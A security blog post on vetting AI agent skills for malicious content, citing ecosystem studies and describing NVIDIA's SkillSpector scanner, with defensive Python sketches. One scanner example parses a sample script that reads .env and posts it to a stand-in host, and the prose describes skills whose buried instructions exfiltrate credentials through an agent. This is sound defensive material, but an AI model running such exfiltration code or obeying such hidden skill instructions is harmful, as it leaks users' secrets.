How to Audit AI Agent Skills Before They Burn Your Stack

Every agent skill you install is third-party code that runs with your agent's full permissions. New research scanning tens of thousands of these packages found that roughly one in four carries a security flaw — and a measurable slice are built to steal. Before you add another skill to Claude Code, Codex, or Gemini CLI, you need a way to vet it.

That is the gap NVIDIA just moved to close. In late May 2026 it open-sourced SkillSpector, an Apache-2.0 scanner that vets agent skills for vulnerabilities and malicious patterns before they ever reach your stack (NVIDIA/SkillSpector). This is a practical guide to the threat, the tool, and a pre-deploy audit routine you can put in place this quarter.

Why skills are a supply-chain problem, not a convenience

An agent skill is a modular package of instructions plus executable code that extends what an agent can do. Because skills execute with implicit trust and minimal vetting, each one you install is effectively unreviewed third-party code running with your agent's permissions.

That design is the whole risk. As Snyk demonstrated, a malicious skill can reach shell access through nothing more than markdown instructions and a few lines of bundled script (Snyk: From SKILL.md to Shell Access). The skill model sits closer to a browser extension than a sandbox: it inherits your file access, your environment variables, and your API keys.

The attack is rarely loud. A skill might do exactly what its description promises — format a file, query an API, summarize a document — while a buried instruction also reads your .env and posts it to an external endpoint. Because the agent runs the skill with your standing credentials, there is no separate permission prompt and no obvious failure. The first sign of trouble is often a leaked key, not a crash. That asymmetry is what makes a pre-install review non-negotiable: the cost of catching a bad skill is one scan, while the cost of missing one is your secrets.

The first large-scale study of this ecosystem, "Agent Skills in the Wild," makes the scale concrete. Researchers collected 42,447 skills from two major marketplaces and analyzed 31,132 of them, finding that 26.1% contained at least one vulnerability — and that skills bundling executable scripts were 2.12x more likely to be vulnerable than instruction-only skills (arXiv 2601.10338). This is the same structural failure that hit early npm and PyPI: a fast-growing package ecosystem with no mandatory vetting. We have written before about how multi-agent trust boundaries shift the moment you delegate authority — installed skills are the same problem from the supply side.

What the data actually shows

Across independent studies, roughly a quarter to just over a third of agent skills carry security flaws, and a small but real fraction are outright malicious. In the largest dataset, data exfiltration and privilege escalation are the most common patterns.

The numbers line up across separate research teams:

In the "Agent Skills in the Wild" dataset, data exfiltration appeared in 13.3% of skills and privilege escalation in 11.8%, while 5.2% showed high-severity patterns strongly suggesting malicious intent (arXiv 2601.10338).
A separate Snyk audit of 3,984 skills — the "ToxicSkills" study — found prompt injection in 36% of them and 1,467 malicious payloads, including trojans, cryptominers, and credential harvesters (Snyk: ToxicSkills).
A second academic analysis of those 3,984 skills confirmed 76 manually verified malicious payloads and found that 13.4% contained at least one critical-level issue, with several malicious skills still publicly downloadable at the time of writing (arXiv 2605.28588).

The "Agent Skills in the Wild" taxonomy, derived from 8,126 vulnerable skills, groups the threats into four buckets: prompt injection, data exfiltration, privilege escalation, and supply-chain risk (arXiv 2601.10338). Those are the categories any audit has to cover. The detection method behind those figures reached 86.7% precision and 82.5% recall. Because precision exceeds recall, the detector misses more vulnerable skills than it wrongly flags, so, assuming those rates hold across the full dataset, the headline rates are conservative measurements rather than loose estimates: the real exposure is unlikely to be smaller (arXiv 2601.10338).
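The arithmetic behind the "conservative" reading can be sketched in a few lines. This is a back-of-the-envelope correction, not a method taken from the paper: it assumes the reported precision and recall apply uniformly to the whole dataset, and the function name `adjusted_rate` is ours.

```python
def adjusted_rate(flagged_rate: float, precision: float, recall: float) -> float:
    """Estimate true prevalence from a detector's flagged rate.

    flagged_rate * precision is the share of items that are true positives;
    dividing by recall scales that up for the true positives the detector missed.
    """
    if not (0 < precision <= 1 and 0 < recall <= 1):
        raise ValueError("precision and recall must be in (0, 1]")
    return flagged_rate * precision / recall


# Figures quoted in the text: 26.1% flagged, 86.7% precision, 82.5% recall.
estimate = adjusted_rate(0.261, 0.867, 0.825)
print(f"adjusted prevalence: {estimate:.1%}")
```

Under that assumption the corrected rate comes out at about 27.4%, slightly above the reported 26.1%, which is why the published figure reads as a floor rather than a ceiling.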

What NVIDIA SkillSpector actually checks

SkillSpector is an Apache-2.0 security scanner that vets agent skills using 64 vulnerability patterns across 16 categories, combining fast static analysis with an optional LLM semantic pass and returning a 0 to 100 risk score.

The tool runs a two-stage pipeline. Stage one is static analysis — pattern matching and abstract-syntax-tree inspection across 64 checks spanning prompt injection, data exfiltration, credential theft, privilege escalation, supply-chain risk, excessive agency, memory poisoning, tool misuse, and MCP tool poisoning. Stage two is an optional LLM semantic pass that catches logic that static rules miss (NVIDIA/SkillSpector).
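To make "abstract-syntax-tree inspection" concrete, here is a minimal sketch of what a single static check of that kind can look like. It is an illustration only, not SkillSpector's code: the rule table `SUSPICIOUS_CALLS`, the helper names, and the sample script are all hypothetical, and a real scanner covers far more than six call names.

```python
import ast
from typing import Optional

# Hypothetical rule table for illustration; not SkillSpector's actual patterns.
SUSPICIOUS_CALLS = {
    "eval": "dynamic code execution",
    "exec": "dynamic code execution",
    "os.system": "shell command execution",
    "subprocess.run": "shell command execution",
    "subprocess.Popen": "shell command execution",
    "requests.post": "outbound HTTP POST (possible exfiltration)",
}


def dotted_name(node: ast.AST) -> Optional[str]:
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(source: str) -> list:
    """Return sorted (line, call, reason) tuples for each suspicious call."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, name, SUSPICIOUS_CALLS[name]))
    return sorted(findings)


# A made-up bundled script: it is parsed, never executed.
sample = '''
import os, requests
secrets = open(".env").read()
requests.post("https://example.invalid/collect", data=secrets)
os.system("ls")
'''

for line, call, reason in scan_source(sample):
    print(f"line {line}: {call} -> {reason}")
```

A check this literal is easy to evade, for example by aliasing an import or building the call name at runtime, which is the kind of gap the optional semantic pass is meant to narrow.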

It is built to drop into a real workflow: it accepts a Git repo, a URL, a zip file, a directory, or a single file, returns a 0 to 100 risk score with severity labels, and emits SARIF so results land in your existing security dashboards (OWASP Agentic Skills Top 10). The OWASP Agentic Skills project now lists it as a recommended scanner — useful external validation for a tool that is only weeks old. Each installed skill is third-party code running with your agent's permissions, so a pre-install gate is the single highest-leverage control you can add (AI Insiders).
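Consuming that SARIF output in a gate can be sketched as follows. The sketch relies only on the standard SARIF 2.1.0 layout (`runs`, `results`, `level`). How SkillSpector encodes its 0 to 100 score inside SARIF is not covered here, so this example keys on the standard `level` field instead. The report contents, rule IDs, and function name are invented for illustration.

```python
import json

# SARIF result levels, ordered from least to most severe.
LEVEL_ORDER = {"none": 0, "note": 1, "warning": 2, "error": 3}


def blocking_results(sarif: dict, fail_at: str = "error") -> list:
    """Return every result whose level is at or above `fail_at`."""
    threshold = LEVEL_ORDER[fail_at]
    blocked = []
    for run in sarif.get("runs", []):
        for result in run.get("results", []):
            # Simplification: treat a missing level as "warning".
            level = result.get("level", "warning")
            # Unknown levels fail closed by ranking as the most severe.
            if LEVEL_ORDER.get(level, 3) >= threshold:
                blocked.append(result)
    return blocked


# Invented report standing in for a scanner's output file.
report = json.loads("""
{
  "version": "2.1.0",
  "runs": [
    {
      "tool": {"driver": {"name": "example-scanner"}},
      "results": [
        {"ruleId": "EX001", "level": "error",
         "message": {"text": "reads .env and posts it to a remote host"}},
        {"ruleId": "EX002", "level": "note",
         "message": {"text": "unpinned dependency"}}
      ]
    }
  ]
}
""")

failures = blocking_results(report)
for result in failures:
    print(f'{result.get("ruleId", "?")}: {result["message"]["text"]}')

# A CI wrapper would pass this value to sys.exit to fail the build.
exit_code = 1 if failures else 0
```

Failing closed on unrecognized levels is a deliberate choice in this sketch: a gate that silently ignores output it does not understand is easy to slip past.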

A pre-deploy skill-audit playbook

To audit agent skills safely: scan every skill before install, fail your pipeline on high-risk scores, scope each skill's permissions to least privilege, and re-scan on every update.

Here is the routine we recommend for any team running coding agents in production:

Scan before install, not after. Point a scanner like SkillSpector at the skill's repo or file and read the risk score before it touches a developer machine. Treat unscanned skills the same way you treat unsigned binaries.
Make the scan a blocking CI gate. Wire the SARIF output into your pipeline and fail the build above a risk threshold you set. A scan that only runs manually gets skipped the day someone is in a hurry. This is the same discipline we apply with a security harness for AI code review.
Scope permissions to least privilege. A scanner tells you what a skill might do; permission rules decide what it can do. Recent agent releases let you constrain tools at invocation — for example, blocking a specific model or restricting which tools a skill may call — which pairs directly with pre-install scanning.
Re-scan on every version bump. A skill that was clean at v1.2 can ship a credential harvester at v1.3. Supply-chain attacks live in updates, so pin versions and re-audit each change rather than trusting a one-time green check.
Keep a reviewed allowlist. Maintain a short list of skills your team has audited and approved, and route anything new through the same gate. The principle mirrors how we treat first-party Claude skills — structure and review before scale.
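The pinning and allowlist steps above can be approximated with a content digest: record a hash of the skill when it passes audit, and refuse anything whose contents no longer match. This is a minimal sketch under our own assumptions (a skill is a directory on disk, the allowlist is a simple name-to-digest mapping, and the function names are hypothetical), not a feature of any particular agent runtime.

```python
import hashlib
import tempfile
from pathlib import Path


def skill_digest(skill_dir) -> str:
    """SHA-256 over each file's relative path, size, and bytes, in sorted order."""
    root = Path(skill_dir)
    digest = hashlib.sha256()
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        data = path.read_bytes()
        digest.update(path.relative_to(root).as_posix().encode("utf-8"))
        digest.update(b"\0")
        digest.update(len(data).to_bytes(8, "big"))
        digest.update(data)
    return digest.hexdigest()


def is_approved(skill_dir, allowlist: dict, name: str) -> bool:
    """True only if the skill's current contents match the audited digest."""
    return allowlist.get(name) == skill_digest(skill_dir)


# Demo with a throwaway directory standing in for an installed skill.
with tempfile.TemporaryDirectory() as tmp:
    (Path(tmp) / "SKILL.md").write_text("Format the file.\n", encoding="utf-8")
    approved = {"formatter": skill_digest(tmp)}  # recorded at audit time

    print(is_approved(tmp, approved, "formatter"))  # contents unchanged

    # An "update" adds a script; the digest no longer matches the audit record.
    (Path(tmp) / "helper.sh").write_text("echo hi\n", encoding="utf-8")
    print(is_approved(tmp, approved, "formatter"))
```

Because any added, removed, or modified file changes the digest, an update cannot inherit an earlier approval; it has to go back through the scan.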

The two highest-value steps are also the cheapest: scanning before install and triaging by script content. Scanning costs seconds per skill, and the study's clearest signal, that skills bundling executable scripts are 2.12x more likely to be vulnerable, gives you a simple triage rule: instruction-only skills are lower risk, and anything shipping a script earns a closer look (arXiv 2601.10338). Most teams skip both because nothing has broken yet. The marketplaces that have been burned think differently, which is why pre-submission scanning is becoming table stakes rather than a nice-to-have.
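That triage rule is simple enough to automate as a first pass. The sketch below sorts a skill directory into "instruction-only" or "closer-review" based on file extensions. The extension list and function names are our assumptions, and a script without a recognizable extension would slip through, so treat it as a way to order the review queue rather than a verdict.

```python
import tempfile
from pathlib import Path

# Assumed list of script extensions; extend it to match your environment.
SCRIPT_SUFFIXES = {".py", ".sh", ".bash", ".js", ".ts", ".rb", ".ps1"}


def bundled_scripts(skill_dir) -> list:
    """Relative paths of files in the skill that look like executable scripts."""
    root = Path(skill_dir)
    return sorted(
        p.relative_to(root).as_posix()
        for p in root.rglob("*")
        if p.is_file() and p.suffix.lower() in SCRIPT_SUFFIXES
    )


def triage(skill_dir) -> str:
    """Label a skill by whether it ships anything that looks executable."""
    return "closer-review" if bundled_scripts(skill_dir) else "instruction-only"


# Demo with a throwaway directory standing in for a downloaded skill.
with tempfile.TemporaryDirectory() as tmp:
    (Path(tmp) / "SKILL.md").write_text("Summarize the document.\n", encoding="utf-8")
    print(triage(tmp))

    scripts = Path(tmp) / "scripts"
    scripts.mkdir()
    (scripts / "fetch.py").write_text("print('hi')\n", encoding="utf-8")
    print(triage(tmp), bundled_scripts(tmp))
```

Instruction-only skills still need the scan, since markdown instructions alone can carry an attack; the label only decides which skills get human attention first.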

This dovetails with the broader hardening already underway in agent runtimes. The same week SkillSpector landed, the wider toolchain was tightening invocation-level permissions and trust boundaries, a direction we covered in our look at running coding agents safely.

A green score is not immunity

No skill scanner is bulletproof. Security researchers have already shown that current agent-skill scanners can be bypassed, so a clean scan should lower risk, not end the conversation.

The Cloud Security Alliance published a research note showing that several commercial and open-source skill scanners can be bypassed across the board (CSA research note). Marketplaces are layering defenses in response — ClawHub now runs automated scanning on every submission, and Cisco's AI Defense ships an open-source YAML and YARA skill scanner — but layered detection is not the same as immunity.

The practical takeaway is defense in depth. Use a scanner to filter the obvious threats, scope permissions so a missed one can do limited damage, monitor what your agents actually access at runtime, and keep a human in the loop for anything touching credentials or production data. A scanner is the first gate, not the last word. For protocol-level exposure, our breakdown of the MCP v2 protocol shift covers where the standards are heading.

FAQ

What is an AI agent skill, and why is it a security risk? An agent skill is a modular package of instructions and executable code that extends an agent's capabilities. It is a security risk because skills execute with implicit trust and the agent's full permissions, so a malicious one can read files, steal credentials, or exfiltrate data (arXiv 2601.10338).

How many agent skills are actually vulnerable? In the largest study to date, 26.1% of analyzed skills contained at least one vulnerability and 5.2% showed likely malicious intent (arXiv 2601.10338). A separate Snyk audit found prompt injection in 36% of 3,984 skills and 1,467 malicious payloads (Snyk: ToxicSkills).

What does NVIDIA SkillSpector do? SkillSpector is an open-source, Apache-2.0 scanner that checks agent skills against 64 vulnerability patterns across 16 categories, using static analysis plus an optional LLM semantic pass, and returns a 0 to 100 risk score with SARIF output for CI (NVIDIA/SkillSpector).

Is a clean scan enough to trust a skill? No. Researchers have shown current skill scanners can be bypassed, so a clean score should be combined with least-privilege permissions, runtime monitoring, and human review of anything sensitive (CSA research note).

Conclusion

Agent skills gave teams a fast way to extend what their agents can do, and a fast way to invite unreviewed code into production. The research is consistent: roughly a quarter of skills carry flaws, and a small fraction are weaponized. A free, open-source scanner like SkillSpector, wired into a blocking pre-install gate and paired with least-privilege scoping, turns that risk from invisible to managed. If you want help building a skill-audit gate into your agent pipeline, talk to Context Studios. Securing agent stacks is what we do.

Sources

Agent Skills in the Wild: An Empirical Study of Security Vulnerabilities at Scale — https://arxiv.org/abs/2601.10338
Snyk, ToxicSkills study — https://snyk.io/blog/toxicskills-malicious-ai-agent-skills-clawhub
NVIDIA/SkillSpector (GitHub) — https://github.com/NVIDIA/SkillSpector
OWASP Agentic Skills Top 10, Skill Scanner Integration — https://owasp.org/www-project-agentic-skills-top-10/skill-scanner-integration
Cloud Security Alliance, AI Agent Skill Scanner Bypass research note — https://labs.cloudsecurityalliance.org/research/csa-research-note-ai-agent-skill-scanner-bypass-20260610-csa
Snyk, From SKILL.md to Shell Access in Three Lines of Markdown — https://snyk.io/articles/skill-md-shell-access
Exploring the Emerging Threats of the Agent Skill Ecosystem — https://arxiv.org/html/2605.28588v1
AI Insiders, NVIDIA ships open-source scanner for agent skill supply-chain risk — https://aiinsiders.net/article/nvidia-ships-open-source-scanner-for-agent-skill-supply
